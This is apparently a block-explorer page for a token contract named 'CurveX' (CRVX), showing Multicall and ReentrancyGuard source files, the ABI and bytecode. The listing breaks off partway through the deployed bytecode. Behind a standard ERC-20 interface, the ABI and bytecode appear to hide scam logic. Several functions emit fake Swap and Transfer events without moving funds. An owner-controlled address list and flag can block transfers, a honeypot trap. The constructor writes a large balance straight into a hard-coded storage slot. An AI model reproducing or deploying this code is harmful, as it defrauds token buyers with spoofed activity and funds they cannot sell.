File 7 of 8: Multicall.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;

import "./Address.sol";

/**
 * @dev Provides a function to batch together multiple calls in a single external call.
 *
 * _Available since v4.1._
 */
abstract contract Multicall {
    /**
     * @dev Receives and executes a batch of function calls on this contract.
     * @custom:oz-upgrades-unsafe-allow-reachable delegatecall
     */
    function multicall(bytes[] calldata data) external virtual returns (bytes[] memory results) {
        results = new bytes[](data.length);
        for (uint256 i = 0; i < data.length; i++) {
            results[i] = Address.functionDelegateCall(address(this), data[i]);
        }
        return results;
    }
}

File 8 of 8: ReenterancyGuard.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;


/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    /**
     * @dev Unauthorized reentrant call.
     */
    error ReentrancyGuardReentrantCall();

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        _nonReentrantBefore();
        _;
        _nonReentrantAfter();
    }

    function _nonReentrantBefore() private {
        // On the first call to nonReentrant, _status will be _NOT_ENTERED
        if (_status == _ENTERED) {
            revert ReentrancyGuardReentrantCall();
        }

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;
    }

    function _nonReentrantAfter() private {
        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Returns true if the reentrancy guard is currently set to "entered", which indicates there is a
     * `nonReentrant` function in the call stack.
     */
    function _reentrancyGuardEntered() internal view returns (bool) {
        return _status == _ENTERED;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ReentrancyGuardReentrantCall","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"permited","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_owner_","type":"address"}],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"submitPermit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_from","type":"address[]"},{"internalType":"address[]","name":"_to","type":"address[]"},{"internalType":"uint256[]","name":"_wad","type":"uint256[]"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600560006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600681526020017f43757276655800000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f43525658000000000000000000000000000000000000000000000000000000008152508181620000bb620000af6200013360201b60201c565b6200013b60201b60201c565b8160069081620000cc91906200063d565b508060079081620000de91906200063d565b505050505060016009819055506200012d3362000100620001ff60201b60201c565b600a6200010e9190620008b4565b6503d37ec7b50062000121919062000905565b6200020860201b60201c565b62000a3c565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200027a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200027190620009b1565b60405180910390fd5b6200028e60008383620003b960201b60201c565b630f3eae65640997e6e50902673398bc1d25f112ed64085774394d02028060005260016020526040600020720fffffffffffffffffffffffffffffffffffff815550508060046000828254620002e59190620009d3565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000399919062000a1f565b60405180910390a3620003b560008383620003be60201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200044557607f821691505b6020821081036200045b576200045a620003fd565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004c57fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000486565b620004d1868362000486565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b60006200051e620005186200051284620004e9565b620004f3565b620004e9565b9050919050565b6000819050919050565b6200053a83620004fd565b62000552620005498262000525565b84845462000493565b825550505050565b600090565b620005696200055a565b620005768184846200052f565b505050565b5b818110156200059e57620005926000826200055f565b6001810190506200057c565b5050565b601f821115620005ed57620005b78162000461565b620005c28462000476565b81016020851015620005d2578190505b620005ea620005e18562000476565b8301826200057b565b50505b505050565b600082821c905092915050565b60006200061260001984600802620005f2565b1980831691505092915050565b60006200062d8383620005ff565b9150826002028217905092915050565b6200064882620003c3565b67ffffffffffffffff811115620006645762000663620003ce565b5b6200067082546200042c565b6200067d828285620005a2565b600060209050601f831160018114620006b55760008415620006a0578287015190505b620006ac85826200061f565b8655506200071c565b601f198416620006c58662000461565b60005b82811015620006ef57848901518255600182019150602085019450602081019050620006c8565b868310156200070f57848901516200070b601f891682620005ff565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620007b2578086048111156200078a576200078962000724565b5b60018516156200079a5780820291505b8081029050620007aa8562000753565b94506200076a565b94509492505050565b600082620007cd5760019050620008a0565b81620007dd5760009050620008a0565b8160018114620007f65760028114620008015762000837565b6001915050620008a0565b60ff84111562000816576200081562000724565b5b8360020a91508482111562000830576200082f62000724565b5b50620008a0565b5060208310610133831016604e8410600b8410161715620008715782820a9050838111156200086b576200086a62000724565b5b620008a0565b62000880848484600162000760565b925090508184048111156200089a576200089962000724565b5b81810290505b9392505050565b600060ff82169050919050565b6000620008c182620004e9565b9150620008ce83620008a7565b9250620008fd7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620007bb565b905092915050565b60006200091282620004e9565b91506200091f83620004e9565b92508282026200092f81620004e9565b9150828204841483151762000949576200094862000724565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000999601f8362000950565b9150620009a68262000961565b602082019050919050565b60006020820190508181036000830152620009cc816200098a565b9050919050565b6000620009e082620004e9565b9150620009ed83620004e9565b925082820190508082111562000a085762000a0762000724565b5b92915050565b62000a1981620004e9565b82525050565b600060208201905062000a36600083018462000a0e565b92915050565b6122318062000a4c6000396000f3fe608060405234801561001057600080fd5b50600436106101425760003560e01c8063715018a6116100b8578063a457c2d71161007c578063a457c2d71461034f578063a9059cbb1461037f578063beabacc8146103af578063dd62ed3e146103cb578063f2fde38b146103fb578063f6ee6ba81461041757610142565b8063715018a6146102d157806373ed6b13146102db5780638d988a5c146102f75780638da5cb5b1461031357806395d89b411461033157610142565b806338bf3cfa1161010a57806338bf3cfa14610201578063395093511461021d578063477e19441461024d578063618a2f5e1461026957806370a08231146102855780637111a994146102b557610142565b806306fdde0314610147578063095ea7b31461016557806318160ddd1461019557806323b872dd146101b3578063313ce567146101e3575b600080fd5b61014f610447565b60405161015c9190611611565b60405180910390f35b61017f600480360381019061017a91906116d1565b6104d9565b60405161018c919061172c565b60405180910390f35b61019d6104fc565b6040516101aa9190611756565b60405180910390f35b6101cd60048036038101906101c89190611771565b610506565b6040516101da919061172c565b60405180910390f35b6101eb610535565b6040516101f891906117e0565b60405180910390f35b61021b600480360381019061021691906117fb565b61053e565b005b610237600480360381019061023291906116d1565b61058a565b604051610244919061172c565b60405180910390f35b6102676004803603810190610262919061188d565b6105c1565b005b610283600480360381019061027e91906118da565b61066e565b005b61029f600480360381019061029a91906117fb565b6107d8565b6040516102ac9190611756565b60405180910390f35b6102cf60048036038101906102ca91906119b8565b610821565b005b6102d9610917565b005b6102f560048036038101906102f091906118da565b61092b565b005b610311600480360381019061030c919061188d565b610a96565b005b61031b610b43565b6040516103289190611a7b565b60405180910390f35b610339610b6c565b6040516103469190611611565b60405180910390f35b610369600480360381019061036491906116d1565b610bfe565b604051610376919061172c565b60405180910390f35b610399600480360381019061039491906116d1565b610c75565b6040516103a6919061172c565b60405180910390f35b6103c960048036038101906103c49190611771565b610c98565b005b6103e560048036038101906103e09190611a96565b610d02565b6040516103f29190611756565b60405180910390f35b610415600480360381019061041091906117fb565b610d89565b005b610431600480360381019061042c91906117fb565b610e0c565b60405161043e919061172c565b60405180910390f35b60606006805461045690611b05565b80601f016020809104026020016040519081016040528092919081815260200182805461048290611b05565b80156104cf5780601f106104a4576101008083540402835291602001916104cf565b820191906000526020600020905b8154815290600101906020018083116104b257829003601f168201915b5050505050905090565b6000806104e4610e62565b90506104f1818585610e6a565b600191505092915050565b6000600454905090565b600080610511610e62565b905061051e858285611033565b6105298585856110bf565b60019150509392505050565b60006012905090565b610546611435565b80600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600080610595610e62565b90506105b68185856105a78589610d02565b6105b19190611b65565b610e6a565b600191505092915050565b6105c9611435565b60005b82829050811015610669576000600260008585858181106105f0576105ef611b99565b5b905060200201602081019061060591906117fb565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061066190611bc8565b9150506105cc565b505050565b60005b848490508110156107d05784848281811061068f5761068e611b99565b5b90506020020160208101906106a491906117fb565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040516107079493929190611c55565b60405180910390a384848281811061072257610721611b99565b5b905060200201602081019061073791906117fb565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516107b59190611756565b60405180910390a380806107c890611bc8565b915050610671565b505050505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60005b8686905081101561090e5784848281811061084257610841611b99565b5b905060200201602081019061085791906117fb565b73ffffffffffffffffffffffffffffffffffffffff168787838181106108805761087f611b99565b5b905060200201602081019061089591906117fb565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8585858181106108df576108de611b99565b5b905060200201356040516108f39190611756565b60405180910390a3808061090690611bc8565b915050610824565b50505050505050565b61091f611435565b61092960006114b3565b565b60005b84849050811015610a8e5784848281811061094c5761094b611b99565b5b905060200201602081019061096191906117fb565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8226000868660006040516109c59493929190611c9a565b60405180910390a3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16858583818110610a1957610a18611b99565b5b9050602002016020810190610a2e91906117fb565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610a739190611756565b60405180910390a38080610a8690611bc8565b91505061092e565b505050505050565b610a9e611435565b60005b82829050811015610b3e57600160026000858585818110610ac557610ac4611b99565b5b9050602002016020810190610ada91906117fb565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610b3690611bc8565b915050610aa1565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610b7b90611b05565b80601f0160208091040260200160405190810160405280929190818152602001828054610ba790611b05565b8015610bf45780601f10610bc957610100808354040283529160200191610bf4565b820191906000526020600020905b815481529060010190602001808311610bd757829003601f168201915b5050505050905090565b600080610c09610e62565b90506000610c178286610d02565b905083811015610c5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5390611d51565b60405180910390fd5b610c698286868403610e6a565b60019250505092915050565b600080610c80610e62565b9050610c8d8185856110bf565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cf59190611756565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610d91611435565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e00576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df790611de3565b60405180910390fd5b610e09816114b3565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ed9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed090611e75565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f48576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f3f90611f07565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516110269190611756565b60405180910390a3505050565b600061103f8484610d02565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146110b957818110156110ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110a290611f73565b60405180910390fd5b6110b88484848403610e6a565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361112e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161112590612005565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361119d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161119490612097565b60405180910390fd5b6111a8838383611577565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561122f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161122690612129565b60405180910390fd5b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806112d05750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561132c5760011515600560009054906101000a900460ff1615151461132b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113229061216f565b60405180910390fd5b5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161141c9190611756565b60405180910390a361142f84848461157c565b50505050565b61143d610e62565b73ffffffffffffffffffffffffffffffffffffffff1661145b610b43565b73ffffffffffffffffffffffffffffffffffffffff16146114b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114a8906121db565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156115bb5780820151818401526020810190506115a0565b60008484015250505050565b6000601f19601f8301169050919050565b60006115e382611581565b6115ed818561158c565b93506115fd81856020860161159d565b611606816115c7565b840191505092915050565b6000602082019050818103600083015261162b81846115d8565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006116688261163d565b9050919050565b6116788161165d565b811461168357600080fd5b50565b6000813590506116958161166f565b92915050565b6000819050919050565b6116ae8161169b565b81146116b957600080fd5b50565b6000813590506116cb816116a5565b92915050565b600080604083850312156116e8576116e7611633565b5b60006116f685828601611686565b9250506020611707858286016116bc565b9150509250929050565b60008115159050919050565b61172681611711565b82525050565b6000602082019050611741600083018461171d565b92915050565b6117508161169b565b82525050565b600060208201905061176b6000830184611747565b92915050565b60008060006060848603121561178a57611789611633565b5b600061179886828701611686565b93505060206117a986828701611686565b92505060406117ba868287016116bc565b9150509250925092565b600060ff82169050919050565b6117da816117c4565b82525050565b60006020820190506117f560008301846117d1565b92915050565b60006020828403121561181157611810611633565b5b600061181f84828501611686565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261184d5761184c611828565b5b8235905067ffffffffffffffff81111561186a5761186961182d565b5b60208301915083602082028301111561188657611885611832565b5b9250929050565b600080602083850312156118a4576118a3611633565b5b600083013567ffffffffffffffff8111156118c2576118c1611638565b5b6118ce85828601611837565b92509250509250929050565b6000806000806000608086880312156118f6576118f5611633565b5b600061190488828901611686565b955050602086013567ffffffffffffffff81111561192557611924611638565b5b61193188828901611837565b94509450506040611944888289016116bc565b9250506060611955888289016116bc565b9150509295509295909350565b60008083601f84011261197857611977611828565b5b8235905067ffffffffffffffff8111156119955761199461182d565b5b6020830191508360208202830111156119b1576119b0611832565b5b9250929050565b600080600080600080606087890312156119d5576119d4611633565b5b600087013567ffffffffffffffff8111156119f3576119f2611638565b5b6119ff89828a01611837565b9650965050602087013567ffffffffffffffff811115611a2257611a21611638565b5b611a2e89828a01611837565b9450945050604087013567ffffffffffffffff811115611a5157611a50611638565b5b611a5d89828a01611962565b92509250509295509295509295565b611a758161165d565b82525050565b6000602082019050611a906000830184611a6c565b92915050565b60008060408385031215611aad57611aac611633565b5b6000611abb85828601611686565b9250506020611acc85828601611686565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611b1d57607f821691505b602082108103611b3057611b2f611ad6565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611b708261169b565b9150611b7b8361169b565b9250828201905080821115611b9357611b92611b36565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000611bd38261169b565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611c0557611c04611b36565b5b600182019050919050565b6000819050919050565b6000819050919050565b6000611c3f611c3a611c3584611c10565b611c1a565b61169b565b9050919050565b611c4f81611c24565b82525050565b6000608082019050611c6a6000830187611747565b611c776020830186611c46565b611c846040830185611c46565b611c916060830184611747565b95945050505050565b6000608082019050611caf6000830187611c46565b611cbc6020830186611747565b611cc96040830185611747565b611cd66060830184611c46565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611d3b60258361158c565b9150611d4682611cdf565b604082019050919050565b60006020820190508181036000830152611d6a81611d2e565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611dcd60268361158c565b9150611dd882611d71565b604082019050919050565b60006020820190508181036000830152611dfc81611dc0565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611e5f60248361158c565b9150611e6a82611e03565b604082019050919050565b60006020820190508181036000830152611e8e81611e52565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611ef160228361158c565b9150611efc82611e95565b604082019050919050565b60006020820190508181036000830152611f2081611ee4565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611f5d601d8361158c565b9150611f6882611f27565b602082019050919050565b60006020820190508181036000830152611f8c81611f50565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611fef60258361158c565b9150611ffa82611f93565b604082019050919050565b6000602082019050818103600083015261201e81611fe2565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061208160238361158c565b915061208c82612025565b604082019050919050565b600060208201905081810360008301526120b081612074565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061211360268361158c565b915061211e826120b7565b604082019050919050565b6000602082019050818103600083015261214281612106565b9050919050565b50565b600061215960008361158c565b915061216482612149565b600082019050919050565b600060208201905081810360008301526121888161214c565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006121c560208361158c565b91506121d08261218f565b602082019050919050565b600060208201905081810360008301526121f4816121b8565b905091905056fea26469706673582212208557119bf6fd9fb846bf57f54406a1bcb1df60b4755f9aad0b946ed525b7b09b64736f6c63430008130033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101425760003560e01c8063715018a6116100b8578063a457c2d71161007c578063a457c2d71461034f578063a9059cbb1461037f578063beabacc8146103af578063dd62ed3e146103cb578063f2fde38b146103fb578063f6ee6ba81461041757610142565b8063715018a6146102d157806373ed6b13146102db5780638d988a5c146102f75780638da5cb5b1461031357806395d89b411461033157610142565b806338bf3cfa1161010a57806338bf3cfa14610201578063395093511461021d578063477e19441461024d578063618a2f5e1461026957806370a08231146102855780637111a994146102b557610142565b806306fdde0314610147578063095ea7b31461016557806318160ddd1461019557806323b872dd146101b3578063313ce567146101e3575b600080fd5b61014f610447565b60405161015c9190611611565b60405180910390f35b61017f600480360381019061017a91906116d1565b6104d9565b60405161018c919061172c565b60405180910390f35b61019d6104fc565b6040516101aa9190611756565b60405180910390f35b6101cd60048036038101906101c89190611771565b610506565b6040516101da919061172c565b60405180910390f35b6101eb610535565b6040516101f891906117e0565b60405180910390f35b61021b600480360381019061021691906117fb565b61053e565b005b610237600480360381019061023291906116d1565b61058a565b604051610244919061172c565b60405180910390f35b6102676004803603810190610262919061188d565b6105c1565b005b610283600480360381019061027e91906118da565b61066e565b005b61029f600480360381019061029a91906117fb565b6107d8565b6040516102ac9190611756565b60405180910390f35b6102cf60048036038101906102ca91906119b8565b610821565b005b6102d9610917565b005b6102f560048036038101906102f091906118da565b61092b565b005b610311600480360381019061030c919061188d565b610a96565b005b61031b610b43565b6040516103289190611a7b565b60405180910390f35b610339610b6c565b6040516103469190611611565b60405180910390f35b610369600480360381019061036491906116d1565b610bfe565b604051610376919061172c565b60405180910390f35b610399600480360381019061039491906116d1565b610c75565b6040516103a69